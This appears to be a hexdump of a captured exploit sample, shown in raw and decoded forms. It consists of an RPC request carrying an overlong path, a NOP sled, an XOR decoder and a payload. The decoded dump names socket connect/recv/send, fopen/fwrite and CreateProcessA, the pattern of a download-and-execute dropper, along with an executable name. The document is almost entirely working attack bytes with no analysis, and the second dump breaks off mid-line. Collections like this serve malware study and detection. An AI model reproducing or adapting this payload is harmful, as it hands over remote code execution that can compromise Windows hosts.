file: csni:shellcodes:halle:halle.bin
Size: 2904 bytes
hexdump -C 3e653421b5f4d7c634f735e07f30e666.bin 00000000 05 00 00 03 10 00 00 00 58 0b 00 00 e5 00 00 00 |........X.......| 00000010 40 0b 00 00 01 00 04 00 05 00 06 00 01 00 00 00 |@...............| 00000020 00 00 00 00 32 24 58 fd cc 45 64 49 b0 70 dd ae |....2$X..EdI.p..| 00000030 74 2c 96 d2 60 5e 0d 00 01 00 00 00 00 00 00 00 |t,..`^..........| 00000040 70 5e 0d 00 02 00 00 00 7c 5e 0d 00 00 00 00 00 |p^......|^......| 00000050 10 00 00 00 80 96 f1 f1 2a 4d ce 11 a6 6a 00 20 |........*M...j. | 00000060 af 6e 72 f4 0c 00 00 00 4d 41 52 42 01 00 00 00 |.nr.....MARB....| 00000070 00 00 00 00 0d f0 ad ba 00 00 00 00 a8 f4 0b 00 |................| 00000080 d0 0a 00 00 d0 0a 00 00 4d 45 4f 57 04 00 00 00 |........MEOW....| 00000090 a2 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F| 000000a0 38 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |8..............F| 000000b0 00 00 00 00 a0 0a 00 00 98 0a 00 00 00 00 00 00 |................| 000000c0 01 10 08 00 cc cc cc cc c8 00 00 00 4d 45 4f 57 |............MEOW| 000000d0 98 0a 00 00 d8 00 00 00 00 00 00 00 02 00 00 00 |................| 000000e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000f0 00 00 00 00 c4 28 cd 00 64 29 cd 00 00 00 00 00 |.....(..d)......| 00000100 07 00 00 00 b9 01 00 00 00 00 00 00 c0 00 00 00 |................| 00000110 00 00 00 46 ab 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000120 00 00 00 46 a5 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000130 00 00 00 46 a6 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000140 00 00 00 46 a4 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000150 00 00 00 46 ad 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000160 00 00 00 46 aa 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000170 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 |...F....`...X...| 00000180 90 00 00 00 40 00 00 00 20 00 00 00 e8 07 00 00 |....@... .......| 00000190 30 00 00 00 01 00 00 00 01 10 08 00 cc cc cc cc |0...............| 000001a0 50 00 00 00 4f b6 88 20 ff ff ff ff 00 00 00 00 |P...O.. ........| 000001b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000001f0 00 00 00 00 00 00 00 00 01 10 08 00 cc cc cc cc |................| 00000200 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 |H.....f.........| 00000210 c0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 |.......F........| 00000220 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0c 00 |............x...| 00000230 58 00 00 00 05 00 06 00 01 00 00 00 70 d8 98 93 |X...........p...| 00000240 98 4f d2 11 a9 3d be 57 b2 00 00 00 32 00 31 00 |.O...=.W....2.1.| 00000250 01 10 08 00 cc cc cc cc 80 00 00 00 0d f0 ad ba |................| 00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000270 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 |.C......`...`...| 00000280 4d 45 4f 57 04 00 00 00 c0 01 00 00 00 00 00 00 |MEOW............| 00000290 c0 00 00 00 00 00 00 46 3b 03 00 00 00 00 00 00 |.......F;.......| 000002a0 c0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 |.......F....0...| 000002b0 01 00 01 00 81 c5 17 03 80 0e e9 4a 99 99 f1 8a |...........J....| 000002c0 50 6f 7a 85 02 00 00 00 00 00 00 00 00 00 00 00 |Poz.............| 000002d0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 |................| 000002e0 01 10 08 00 cc cc cc cc 30 00 00 00 78 00 6e 00 |........0...x.n.| 000002f0 00 00 00 00 d8 da 0d 00 00 00 00 00 00 00 00 00 |................| 00000300 20 2f 0c 00 00 00 00 00 00 00 00 00 03 00 00 00 | /..............| 00000310 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 |........F.X.....| 00000320 01 10 08 00 cc cc cc cc 10 00 00 00 30 00 2e 00 |............0...| 00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000340 01 10 08 00 cc cc cc cc 68 00 00 00 0e 00 ff ff |........h.......| 00000350 68 8b 0b 00 02 00 00 00 00 00 00 00 00 00 00 00 |h...............| 00000360 de 03 00 00 00 00 00 00 de 03 00 00 5c 00 5c 00 |............\.\.| 00000370 46 00 58 00 4e 00 42 00 46 00 58 00 46 00 58 00 |F.X.N.B.F.X.F.X.| 00000380 4e 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 |N.B.F.X.F.X.F.X.| 00000390 46 00 58 00 c6 16 00 01 cc e0 fd 7f cc e0 fd 7f |F.X.............| 000003a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 00000440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 eb 02 |................| 00000450 eb 05 e8 f9 ff ff ff 5b 31 c9 66 b9 86 06 80 73 |.......[1.f....s| 00000460 0e d4 43 e2 f9 3d 8b d5 d4 d4 8f 82 83 84 3c 67 |..C..=........<g| 00000470 d7 d4 d4 59 67 4b d4 d4 d4 59 6f 7c d4 d4 d4 13 |...YgK...Yo|....| 00000480 57 73 d5 d4 d4 db d4 d4 d4 3c d3 d7 d4 d4 5d 57 |Ws.......<....]W| 00000490 20 d4 d4 d4 59 6f 63 d4 d4 d4 13 57 73 d5 d4 d4 | ...Yoc....Ws...| 000004a0 d9 d4 d4 d4 3c 38 d6 d4 d4 5d 57 24 d4 d4 d4 59 |....<8...]W$...Y| 000004b0 6f 10 d4 d4 d4 3c 17 d6 d4 d4 5d 57 30 d4 d4 d4 |o....<....]W0...| 000004c0 59 6f 1e d4 d4 d4 3c 66 d6 d4 d4 5d 57 3c d4 d4 |Yo....<f...]W<..| 000004d0 d4 59 6f 01 d4 d4 d4 3c 75 d6 d4 d4 5d 57 38 d4 |.Yo....<u...]W8.| 000004e0 d4 d4 59 67 de d4 d4 d4 59 6f c5 d4 d4 d4 3c 5e |..Yg....Yo....<^| 000004f0 d6 d4 d4 5d 57 95 d4 d4 d4 59 6f c8 d4 d4 d4 3c |...]W....Yo....<| 00000500 ad d6 d4 d4 5d 57 91 d4 d4 d4 59 6f f7 d4 d4 d4 |....]W....Yo....| 00000510 3c bc d6 d4 d4 5d 57 9d d4 d4 d4 59 6f ff d4 d4 |<....]W....Yo...| 00000520 d4 3c 83 d6 d4 d4 5d 57 99 d4 d4 d4 59 6f e4 d4 |.<....]W....Yo..| 00000530 d4 d4 3c 92 d6 d4 d4 5d 57 85 d4 d4 d4 59 6f e1 |..<....]W....Yo.| 00000540 d4 d4 d4 3c e1 d6 d4 d4 5d 57 81 d4 d4 d4 59 67 |...<....]W....Yg| 00000550 8d d4 d4 d4 59 6f b4 d4 d4 d4 3c ca d6 d4 d4 5d |....Yo....<....]| 00000560 57 53 d4 d4 d4 59 6f b2 d4 d4 d4 3c d9 d6 d4 d4 |WS...Yo....<....| 00000570 5d 57 5f d4 d4 d4 59 6f b9 d4 d4 d4 3c 28 d5 d4 |]W_...Yo....<(..| 00000580 d4 5d 57 5b d4 d4 d4 59 6f a0 d4 d4 d4 3c 3f d5 |.]W[...Yo....<?.| 00000590 d4 d4 5d 57 47 d4 d4 d4 59 6f af d4 d4 d4 3c 0e |..]WG...Yo....<.| 000005a0 d5 d4 d4 5d 57 43 d4 d4 d4 59 6f 56 d4 d4 d4 3c |...]WC...YoV...<| 000005b0 1d d5 d4 d4 5d 57 4f d4 d4 d4 87 3c 3f d6 d4 d4 |....]WO....<?...| 000005c0 8f 8c 8b 8a 3c c4 d1 d4 d4 3c 48 2a 2b 2b d4 d4 |....<....<H*++..| 000005d0 d4 d4 92 30 f0 a2 fa c9 a3 a7 e6 8b e7 e6 d4 83 |...0............| 000005e0 87 95 87 a0 b5 a6 a0 a1 a4 d4 a7 bb b7 bf b1 a0 |................| 000005f0 d4 b7 bb ba ba b1 b7 a0 d4 a6 b1 b7 a2 d4 a7 b1 |................| 00000600 ba b0 d4 b7 b8 bb a7 b1 a7 bb b7 bf b1 a0 d4 d4 |................| 00000610 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| 00000620 d4 d4 d4 d4 d4 d4 d4 b9 a7 a2 b7 a6 a0 d4 b2 bb |................| 00000630 a4 b1 ba d4 b2 b7 b8 bb a7 b1 d4 b2 a3 a6 bd a0 |................| 00000640 b1 d4 b9 b1 b9 a7 b1 a0 d4 b9 b5 b8 b8 bb b7 d4 |................| 00000650 b2 a6 b1 b1 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| 00000660 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 bf b1 a6 |................| 00000670 ba b1 b8 e7 e6 d4 93 b1 a0 84 a6 bb b7 95 b0 b0 |................| 00000680 a6 b1 a7 a7 d4 98 bb b5 b0 98 bd b6 a6 b5 a6 ad |................| 00000690 95 d4 87 b8 b1 b1 a4 d4 91 ac bd a0 80 bc a6 b1 |................| 000006a0 b5 b0 d4 97 a6 b1 b5 a0 b1 84 a6 bb b7 b1 a7 a7 |................| 000006b0 95 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| 000006c0 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| * 000006e0 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 90 d4 d4 d4 d4 d4 |................| 000006f0 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| * 00000730 d4 d4 a3 ff b6 d4 d4 d4 d4 d4 a3 bd ba bc b8 a4 |................| 00000740 a4 e7 e6 fa b1 ac b1 d4 bb a4 b1 ba d4 c2 d4 d4 |................| 00000750 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| * 00000770 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 85 83 82 |................| 00000780 82 2b 47 24 d4 d4 d4 84 8d 83 85 2b 47 20 d4 d4 |.+G$.......+G ..| 00000790 d4 8a 8b 8d 17 e5 14 5d 57 77 d5 d4 d4 5f 47 77 |.......]Ww..._Gw| 000007a0 d5 d4 d4 ef 47 47 d5 d4 d4 a9 b7 96 5d 47 77 d5 |....GG......]Gw.| 000007b0 d4 d4 e5 14 5f 57 77 d5 d4 d4 15 34 d6 5f 5f 4f |...._Ww....4.__O| 000007c0 d5 d4 d4 d5 15 5f d5 d7 57 5b d5 d4 d4 83 82 85 |....._..W[......| 000007d0 5d 2a 5d 13 5f 5f 73 d5 d4 d4 27 72 8d 8a 8b a1 |]*].__s...'r....| 000007e0 68 e5 14 5f 57 77 d5 d4 d4 05 34 5f 5f 4b d5 d4 |h.._Ww....4__K..| 000007f0 d4 d5 15 e5 14 b2 5f d5 15 34 d6 5f 5f 43 d5 d4 |......_..4.__C..| 00000800 d4 d5 1c 5f dc d7 5f 5b d5 d4 d4 5d 1c 17 e5 14 |..._.._[...]....| 00000810 17 3d 1c d6 d4 d4 ea 5f 94 e0 ea 5f 7c 6c d4 d4 |.=....._..._|l..| 00000820 d4 3d da d4 d4 d4 84 85 82 81 b0 75 e4 d4 d4 d4 |.=.........u....| 00000830 51 14 ac 36 ea 5f 94 d8 ea 5f a4 c8 79 ea 5f bc |Q..6._..._..y._.| 00000840 dc 5d 7f 5b d5 d4 d4 5d 3c b2 55 ec 99 8e a1 15 |.].[...]<.U.....| 00000850 d1 e8 d4 d4 d4 5f dc d7 5f 5b d5 d4 d4 b2 55 ed |....._.._[....U.| 00000860 84 91 a1 79 55 15 ac d4 d4 d4 5f e5 d7 67 5b d5 |...yU....._..g[.| 00000870 d4 d4 55 12 cc d4 d4 d4 79 5d 57 47 d5 d4 d4 79 |..U.....y]WG...y| 00000880 d7 57 5b d5 d4 d4 5d 57 43 d5 d4 d4 79 d7 57 5b |.W[...]WC...y.W[| 00000890 d5 d4 d4 5d 57 4f d5 d4 d4 79 d7 57 5b d5 d4 d4 |...]WO...y.W[...| 000008a0 5d 57 4b d5 d4 d4 89 8a 8d 8c 17 84 6c d4 d0 d4 |]WK.........l...| 000008b0 d4 3c a5 d5 d4 d4 e9 d4 d4 d4 d4 db 50 3e 2b 2b |.<..........P>++| 000008c0 2b 5d 57 57 d5 d4 d4 8c 5f 47 57 d5 d4 d4 86 bc |+]WW...._GW.....| 000008d0 d5 d5 d4 d4 ea 2b 87 95 e9 d4 d4 d4 d4 db 51 31 |.....+........Q1| 000008e0 2b 2b 2b bc d2 d4 d4 d4 bc d5 d4 d4 d4 bc d6 d4 |+++.............| 000008f0 d4 d4 ea 2b 87 91 e9 2b 2b 2b 2b db 50 36 2b 2b |...+...++++.P6++| 00000900 2b 5d 57 2c d4 d4 d4 83 84 87 59 47 ab d5 d4 d4 |+]W,......YG....| 00000910 12 d6 c2 86 59 47 28 d4 d4 d4 b2 13 d6 d6 d4 b2 |....YG(.........| 00000920 5f af dc b2 5d ae d6 5f af d0 5d ae d0 86 5f 57 |_...].._..]..._W| 00000930 2c d4 d4 d4 84 ea 2b 87 9d e9 d4 d4 d4 d4 db 58 |,.....+........X| 00000940 12 2b 2b 2b 8f 8c 8b 84 6c d4 c4 d4 d4 3c 01 d4 |.+++....l....<..| 00000950 d4 d4 e9 d4 d4 d4 d4 db 50 3e 2b 2b 2b 5d 57 b4 |........P>+++]W.| 00000960 d5 d4 d4 8c 3c ed d4 d4 d4 3c 0c d4 d4 d4 3c 83 |....<....<....<.| 00000970 d4 d4 d4 3c cb d5 d4 d4 17 5f 57 2c d4 d4 d4 84 |...<....._W,....| 00000980 ea 2b 87 81 5f 57 7f d5 d4 d4 94 5d 57 7f d5 d4 |.+.._W.....]W...| 00000990 d4 e9 d1 d4 d4 d4 db 50 d1 d4 d4 d4 3d 96 2b 2b |.......P....=.++| 000009a0 2b 17 bc d4 d4 d4 d4 bc d0 d4 d4 d4 59 47 53 d5 |+...........YGS.| 000009b0 d4 d4 86 5f 47 2c d4 d4 d4 86 ea 2b 87 99 e9 d5 |..._G,.....+....| 000009c0 d4 d4 d4 db 58 64 2b 2b 2b 17 83 82 5f 6f 53 d5 |....Xd+++..._oS.| 000009d0 d4 d4 5f 67 5f d5 d4 d4 ed 23 8a 8b db 50 e6 d4 |.._g_....#...P..| 000009e0 d4 d4 bc d4 d4 d4 d4 bc d4 c4 d4 d4 5f 47 b4 d5 |............_G..| 000009f0 d4 d4 86 5f 47 2c d4 d4 d4 86 ea 2b 87 99 e9 d5 |..._G,.....+....| 00000a00 d4 d4 d4 db 58 a4 2b 2b 2b d5 57 5f d5 d4 d4 3d |....X.+++.W_...=| 00000a10 84 d4 d4 d4 3c ba d4 d4 d4 84 5f 57 2c d4 d4 d4 |....<....._W,...| 00000a20 84 ea 2b 87 81 8c 17 5d 13 84 ea 2b 47 43 d4 d4 |..+....]...+GC..| 00000a30 d4 8b 84 83 bc d4 d4 d4 d4 84 ea 2b 47 47 d4 d4 |...........+GG..| 00000a40 d4 8b 8b 8b 8c 17 59 47 b0 d5 d4 d4 86 59 47 b8 |......YG.....YG.| 00000a50 d5 d4 d4 86 ea 2b 47 53 d4 d4 d4 8b 8b 5d 57 bc |.....+GS.....]W.| 00000a60 d5 d4 d4 17 2b 67 bc d5 d4 d4 84 bc d5 d4 d4 d4 |....+g..........| 00000a70 5f 47 b4 d5 d4 d4 86 ea 2b 47 5b d4 d4 d4 8b 8b |_G......+G[.....| 00000a80 8b 8b 3d 97 2b 2b 2b 5f 47 bc d5 d4 d4 86 ea 2b |..=.+++_G......+| 00000a90 47 5f d4 d4 d4 8b 17 84 59 57 d8 d5 d4 d4 84 59 |G_......YW.....Y| 00000aa0 57 c8 d5 d4 d4 84 bc d4 d4 d4 d4 bc d4 d4 d4 d4 |W...............| 00000ab0 bc fc d4 d4 d4 bc d4 d4 d4 d4 bc d4 d4 d4 d4 bc |................| 00000ac0 d4 d4 d4 d4 59 57 b8 d5 d4 d4 84 bc d4 d4 d4 d4 |....YW..........| 00000ad0 ea 2b 47 38 d4 d4 d4 8c 17 3c 7d 2b 2b 2b bc d4 |.+G8.....<}+++..| 00000ae0 d4 d4 d4 2b 47 3c d4 d4 d4 44 d4 00 5c 00 43 00 |...+G<...D..\.C.| 00000af0 24 00 5c 00 31 00 32 00 33 00 34 00 35 00 36 00 |$.\.1.2.3.4.5.6.| 00000b00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 |1.1.1.1.1.1.1.1.| 00000b10 31 00 31 00 31 00 31 00 31 00 31 00 31 00 2e 00 |1.1.1.1.1.1.1...| 00000b20 64 00 6f 00 63 00 00 00 01 10 08 00 cc cc cc cc |d.o.c...........| 00000b30 20 00 00 00 30 00 2d 00 00 00 00 00 88 2a 0c 00 | ...0.-......*..| 00000b40 02 00 00 00 01 00 00 00 28 8c 0c 00 01 00 00 00 |........(.......| 00000b50 07 00 00 00 00 00 00 00 |........| 00000b58
00000000: 05 00 00 03 10 00 00 00 - 58 0b 00 00 e5 00 00 00 ........ X....... 00000010: 40 0b 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00 ........ ........ 00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae ....2.X. .EdI.p.. 00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00 t....... ........ 00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00 p....... ........ 00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20 ........ .M...j.. 00000060: af 6e 72 f4 0c 00 00 00 - 4d 41 52 42 01 00 00 00 .nr..... MARB.... 00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00 ........ ........ 00000080: d0 0a 00 00 d0 0a 00 00 - 4d 45 4f 57 04 00 00 00 ........ MEOW.... 00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46 ........ .......F 000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46 8....... .......F 000000b0: 00 00 00 00 a0 0a 00 00 - 98 0a 00 00 00 00 00 00 ........ ........ 000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 4d 45 4f 57 ........ ....MEOW 000000d0: 98 0a 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00 ........ ........ 000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00 ........ d....... 00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00 ........ ........ 00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00 ...F.... ....X... 00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 e8 07 00 00 ........ ........ 00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc 0....... ........ 000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00 P...O... ........ 000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc ........ ........ 00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00 H.....f. ........ 00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00 .......F ........ 00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00 ........ ....x... 00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93 X....... ....p... 00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00 .O.....W ....2.1. 00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba ........ ........ 00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00 .C...... ........ 00000280: 4d 45 4f 57 04 00 00 00 - c0 01 00 00 00 00 00 00 MEOW.... ........ 00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00 .......F ........ 000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00 .......F ....0... 000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a ........ ...J.... 000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00 Poz..... ........ 000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00 ........ ........ 000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00 ........ 0...x.n. 000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00 ........ ........ 00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00 ........ F.X..... 00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00 ........ ....0... 00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff ........ h....... 00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00 h....... ........ 00000360: de 03 00 00 00 00 00 00 - de 03 00 00 5c 00 5c 00 ........ ........ 00000370: 46 00 58 00 4e 00 42 00 - 46 00 58 00 46 00 58 00 F.X.N.B. F.X.F.X. 00000380: 4e 00 42 00 46 00 58 00 - 46 00 58 00 46 00 58 00 N.B.F.X. F.X.F.X. 00000390: 46 00 58 00 c6 16 00 01 - cc e0 fd 7f cc e0 fd 7f F.X..... ........ 000003a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000400: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000410: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000420: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000430: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000440: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 eb 02 ........ ........ 00000450: eb 05 e8 f9 ff ff ff 5b - 31 c9 66 b9 86 06 80 73 ........ 1.f....s 00000460: 0e d4 43 e2 f9 e9 5f 01 - 00 00 5b 56 57 50 e8 b3 ..C..... ...VWP.. 00000470: 03 00 00 8d b3 9f 00 00 - 00 8d bb a8 00 00 00 c7 ........ ........ 00000480: 83 a7 01 00 00 0f 00 00 - 00 e8 07 03 00 00 89 83 ........ ........ 00000490: f4 00 00 00 8d bb b7 00 - 00 00 c7 83 a7 01 00 00 ........ ........ 000004a0: 0d 00 00 00 e8 ec 02 00 - 00 89 83 f0 00 00 00 8d ........ ........ 000004b0: bb c4 00 00 00 e8 c3 02 - 00 00 89 83 e4 00 00 00 ........ ........ 000004c0: 8d bb ca 00 00 00 e8 b2 - 02 00 00 89 83 e8 00 00 ........ ........ 000004d0: 00 8d bb d5 00 00 00 e8 - a1 02 00 00 89 83 ec 00 ........ ........ 000004e0: 00 00 8d b3 0a 00 00 00 - 8d bb 11 00 00 00 e8 8a ........ ........ 000004f0: 02 00 00 89 83 41 00 00 - 00 8d bb 1c 00 00 00 e8 .....A.. ........ 00000500: 79 02 00 00 89 83 45 00 - 00 00 8d bb 23 00 00 00 y.....E. ........ 00000510: e8 68 02 00 00 89 83 49 - 00 00 00 8d bb 2b 00 00 .h.....I ........ 00000520: 00 e8 57 02 00 00 89 83 - 4d 00 00 00 8d bb 30 00 ..W..... M.....0. 00000530: 00 00 e8 46 02 00 00 89 - 83 51 00 00 00 8d bb 35 ...F.... .Q.....5 00000540: 00 00 00 e8 35 02 00 00 - 89 83 55 00 00 00 8d b3 ....5... ..U..... 00000550: 59 00 00 00 8d bb 60 00 - 00 00 e8 1e 02 00 00 89 Y....... ........ 00000560: 83 87 00 00 00 8d bb 66 - 00 00 00 e8 0d 02 00 00 .......f ........ 00000570: 89 83 8b 00 00 00 8d bb - 6d 00 00 00 e8 fc 01 00 ........ m....... 00000580: 00 89 83 8f 00 00 00 8d - bb 74 00 00 00 e8 eb 01 ........ .t...... 00000590: 00 00 89 83 93 00 00 00 - 8d bb 7b 00 00 00 e8 da ........ ........ 000005a0: 01 00 00 89 83 97 00 00 - 00 8d bb 82 00 00 00 e8 ........ ........ 000005b0: c9 01 00 00 89 83 9b 00 - 00 00 53 e8 eb 02 00 00 ........ ..S..... 000005c0: 5b 58 5f 5e e8 10 05 00 - 00 e8 9c fe ff ff 00 00 .X...... ........ 000005d0: 00 00 46 e4 24 76 2e 1d - 77 73 32 5f 33 32 00 57 ..F..v.. ws2.32.W 000005e0: 53 41 53 74 61 72 74 75 - 70 00 73 6f 63 6b 65 74 SAStartu p.socket 000005f0: 00 63 6f 6e 6e 65 63 74 - 00 72 65 63 76 00 73 65 .connect .recv.se 00000600: 6e 64 00 63 6c 6f 73 65 - 73 6f 63 6b 65 74 00 00 nd.close socket.. 00000610: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000620: 00 00 00 00 00 00 00 6d - 73 76 63 72 74 00 66 6f .......m svcrt.fo 00000630: 70 65 6e 00 66 63 6c 6f - 73 65 00 66 77 72 69 74 pen.fclo se.fwrit 00000640: 65 00 6d 65 6d 73 65 74 - 00 6d 61 6c 6c 6f 63 00 e.memset .malloc. 00000650: 66 72 65 65 00 00 00 00 - 00 00 00 00 00 00 00 00 free.... ........ 00000660: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 6b 65 72 ........ .....ker 00000670: 6e 65 6c 33 32 00 47 65 - 74 50 72 6f 63 41 64 64 nel32.Ge tProcAdd 00000680: 72 65 73 73 00 4c 6f 61 - 64 4c 69 62 72 61 72 79 ress.Loa dLibrary 00000690: 41 00 53 6c 65 65 70 00 - 45 78 69 74 54 68 72 65 A.Sleep. ExitThre 000006a0: 61 64 00 43 72 65 61 74 - 65 50 72 6f 63 65 73 73 ad.Creat eProcess 000006b0: 41 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 A....... ........ 000006c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000006d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000006e0: 00 00 00 00 00 00 00 00 - 00 00 44 00 00 00 00 00 ........ ..D..... 000006f0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000700: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000710: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000720: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000730: 00 00 77 2b 62 00 00 00 - 00 00 77 69 6e 68 6c 70 ..w.b... ..winhlp 00000740: 70 33 32 2e 65 78 65 00 - 6f 70 65 6e 00 16 00 00 p32.exe. open.... 00000750: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000760: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000770: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 51 57 56 ........ .....QWV 00000780: 56 ff 93 f0 00 00 00 50 - 59 57 51 ff 93 f4 00 00 V......P YWQ..... 00000790: 00 5e 5f 59 c3 31 c0 89 - 83 a3 01 00 00 8b 93 a3 ...Y.1.. ........ 000007a0: 01 00 00 3b 93 93 01 00 - 00 7d 63 42 89 93 a3 01 ........ ..cB.... 000007b0: 00 00 31 c0 8b 83 a3 01 - 00 00 c1 e0 02 8b 8b 9b ..1..... ........ 000007c0: 01 00 00 01 c1 8b 01 03 - 83 